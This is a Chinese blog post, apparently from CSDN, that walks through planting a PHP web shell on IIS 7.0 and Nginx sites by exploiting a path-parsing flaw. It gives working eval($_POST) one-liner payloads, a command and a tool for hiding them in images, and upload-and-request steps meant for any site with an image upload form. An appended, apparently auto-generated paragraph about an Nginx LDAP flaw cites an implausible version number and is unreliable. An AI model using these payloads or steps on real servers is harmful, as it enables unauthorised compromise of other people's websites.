通杀IIS7.0畸形解析0day漏洞(类似Nginx那个0day)



在群里看见许多大牛在周杰伦官方留页面

一群小菜四处宣传,实在没必要

渗透方法其实和网上并没有区别

大家可以网上看看

通杀IIS7.0畸形解析0day漏洞

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,

图片随便找一张.

【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到

edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】

一句话:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。

找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。

比如假设图片地址为http://www.xxx.com/fuck/1.jpg

则执行地址为http://www.xxx.com/fuck/1.jpg/shell.php

然后,会在目录下生成shell.php。

比如www.xxx.com/tupian/shell.php

shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 

找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。

<?fputs(fopen(“fuck.php”,”w”),”<?eval(\$_POST[fuck]);?>”)?>

 

做好一句话图片木马后往头像上传,访问头像地址,在后面随便加个/xx.php

剩下的你们懂得!

上面写的也很详细吧!

Nginx 0day是指Nginx的一个零日漏洞,其中涉及到了Nginx的LDAP-auth守护程序。该漏洞的影响范围是Nginx版本18.1。根据AgainstTheWest的GitHub存储库,该漏洞主要与Nginx中的LDAP-auth守护程序有关,该守护程序与Nginx一起使用,用于访问私有的GitHub、Bitbucket、Jenkins和Gitlab实例。虽然该漏洞在4月11日时已被公开,并且Nginx已发布了一篇博客来描述这个漏洞,但需要注意的是,该漏洞只影响Nginx的LDAP参考实现,而不影响Nginx的开源和Nginx Plus版本。如果您没有使用LDAP参考实现,那么您无需采取任何措施。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [关于 Nginx 0day 漏洞,需要采取哪些措施?](https://blog.csdn.net/ll837448792/article/details/126105462)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NGINX 0 DAY LDAP RCE 漏洞来龙去脉](https://blog.csdn.net/u012516914/article/details/126080132)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值